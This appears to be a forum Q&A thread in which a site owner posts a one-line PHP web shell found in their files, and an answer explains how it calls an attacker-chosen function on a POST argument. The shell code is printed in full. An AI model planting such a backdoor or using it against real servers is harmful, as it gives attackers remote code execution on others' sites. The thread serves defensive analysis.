I found a line of script left by the hacker in one of my PHP files. And it reads like this:
<?php
($_=@$_GET[2]).@$_($_POST[1]);
?>
Can anyone please give some hints about what this line of code does? Thank you
I found a line of script left by the hacker in one of my PHP files. And it reads like this:
<?php
($_=@$_GET[2]).@$_($_POST[1]);
?>
Can anyone please give some hints about what this line of code does? Thank you
As Reeno already said in a comment, it's like a PHP shell.
Store the GET variable with the key '2' in a variable called $_
. Due to PHP's nature of weak typing, we do not need quotes around the number.
$_=@$_GET[2]
Treat $_
as a callable function name and execute it with $_POST[1]
as the first argument.
@$_($_POST[1])
The @
operators should suppress error logging, see PHP.net: Error Control Operators.
The concatenation operator between the two statements does actually nothing important. It could be rewritten like this:
$_=@$_GET[2];
@$_($_POST[1]);
Calling arbitrary functions. I won't mention the specific HTTP headers for a successful attack, but this should be fairly easy for every (web) programmer.